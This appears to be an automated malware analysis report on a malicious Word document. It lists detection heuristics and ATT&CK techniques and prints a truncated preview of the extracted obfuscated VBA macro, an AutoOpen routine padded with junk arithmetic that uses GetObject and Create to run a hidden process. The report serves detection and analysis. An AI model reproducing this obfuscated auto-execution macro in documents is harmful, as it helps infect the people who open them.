MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes the GetObject function. This indicates an attempt to execute arbitrary code upon opening the document. The VBA code appears heavily obfuscated with complex mathematical operations, but the GetObject call is a clear indicator of malicious intent, likely to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Sagent-6902893-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6902893-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16486 bytes |
SHA-256: 44f51f301e4d99f0b6ab421f6b024d0bc312db60cd5a2009bd2f2ce305e84dfb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GQDAA4A"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mGwAGQD"
Attribute VB_Base = "0{A3231994-0405-462A-A1C2-8FF3BF66FF47}{A302F022-DC64-47CA-B2F5-9FDFF06F53D7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "hAAZAA"
Sub autoopen()
On Error Resume Next
If mAAAcA = oCABAxA Then
lAQA_AA = 360460939 * CInt(616932250) / _
493785898 + Sqr(458583148) * 728298510 / CInt(931328294) * (650238058 * 551928430)
kcDZ4UQ = (93967997 - Asc(wQAcBB) / BABAD1A / 367112517 + _
hB1Zk41A / Fix(657703886 + Log(FAABBX * Sgn(583937233) + toUAZUD / CSng(427730617))))
End If
If OwAAGD4_ = pAADBB Then
VAUDABAk = 712164150 * CInt(678201983) / _
403439880 + Sqr(608737942) * 346981986 / CInt(887036070) * (31494867 * 189248671)
BDZGDAxB = (51313011 - Asc(SxxAAB) / vAAUBA / 938327368 + _
oAQADo / Fix(547418284 + Log(mAAAAQ * Sgn(602746105) + jDoA1_A / CSng(108804646))))
End If
If loZ1AQ = nxXQBkAA Then
rwXCUQ = 959896255 * CInt(130090308) / _
129873245 + Sqr(724149820) * 455445265 / CInt(707421804) * (458249446 * 249045504)
zU_1AB = (890124428 - Asc(cUUoDD4) / JACQXUD / 790973879 + _
ZABCcGkQ / Fix(714023240 + Log(AAQDAD * Sgn(258489203) + SBkxAAAw / CSng(526080821))))
End If
Set v_BGcG = GetObject(mGwAGQD.RGAADA)
If jBxAoCUD = c4AAoDZX Then
qkADAAwA = 135865924 * CInt(496703309) / _
59940355 + Sqr(979082682) * 820981873 / CInt(149309126) * (563785917 * 364391530)
HDBoDDQ = (607898886 - Asc(WA1BXG) / MCAAU1C / 725977624 + _
okwZwBA / Fix(429506819 + Log(Cc1kAAxA * Sgn(194570980) + HcAko1oG / CSng(290826635))))
End If
If jAooQAA = T4AA4B Then
ZDAUUAx = 8602144 * CInt(576647515) / _
85589341 + Sqr(516300873) * 879881470 / CInt(857882346) * (196164702 * 789476055)
KAAAAXAx = (13419597 - Asc(wQwAQ1) / NBA4BowA / 289888408 + _
JAAAUko / Fix(904064640 + Log(QGU_ADAo * Sgn(871851531) + wDAc1kB / CSng(773913630))))
End If
If jQQwoA = LQxBAQB Then
oAQAU4QD = 443932658 * CInt(795783673) / _
756604422 + Sqr(927126228) * 716537682 / CInt(886780290) * (972002796 * 653697702)
RQQBQxX = (523253843 - Asc(iXo_AAxw) / MAxk_A / 244604452 + _
tAAAAwG / Fix(312501987 + Log(mAoQUA * Sgn(253004511) + GABAcA / CSng(128409972))))
End If
v_BGcG.ShowWindow = 77530 - 77530
If jAAoAx = lAA1AXGA Then
OBkACAX = 269266117 * CInt(715040411) / _
842971776 + Sqr(751485346) * 212281959 / CInt(754140829) * (533957089 * 796873008)
aAXA_UxA = (137014469 - Asc(KQAZAA) / KDwAGQ / 318548519 + _
aAQZQA / Fix(152383850 + Log(zAAkcA1 * Sgn(201328988) + FwQCAB / CSng(317166610))))
End If
If u1AAcA = nBB_UA Then
k4UAABAQ = 85219461 * CInt(204448542) / _
239211574 + Sqr(390941598) * 839005007 / CInt(74740253) * (911348423 * 418700860)
zAcGGADX = (77693527 - Asc(vQA1DA) / UCAB1A / 795536785 + _
JGAAZUQ / Fix(117999692 + Log(z__cZA * Sgn(651591479) + WDQAD1B / CSng(738625387))))
End If
If pXUXABkQ = pDGXcw4 Then
SZQAcAGB = 459707733 * CInt(94268094) / _
280763892 + Sqr(556862412) * 850561241 / CInt(699526922) * (262996421 * 234784759)
QAkxDC = (420550504 - Asc(coxAADk) / OQAoUc / 666531387 + _
vCGACAA / Fix(272745002 + Log(RABxDAkc * Sgn(446761763) + XUQxCA / CSng(453161763))))
End If
GetObject(mGwAGQD.Gcw1A_AC). _
Create# RoAoxUAC + mGwAGQD.B4QAXA + BXAU4GCc + mGwAGQD.GZAAAA + jAkAUAA + mGwAGQD.JBQAoABG + wckQkUDx, EQUQAUAZ, v_BGcG, hAAAXDAA
If sABo4Q = dC4UD1A Then
cBAGAAAk = 232633544 * CInt(118776403) / _
506359801 + Sqr(108038854) * 715836710 / CInt(151988754) * (880926149 * 381311283)
f1Ax1BAA = (288996547 - Asc(tQA4UAo) / qkAADGo / 460044872 + _
lAB_wDUQ / F
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.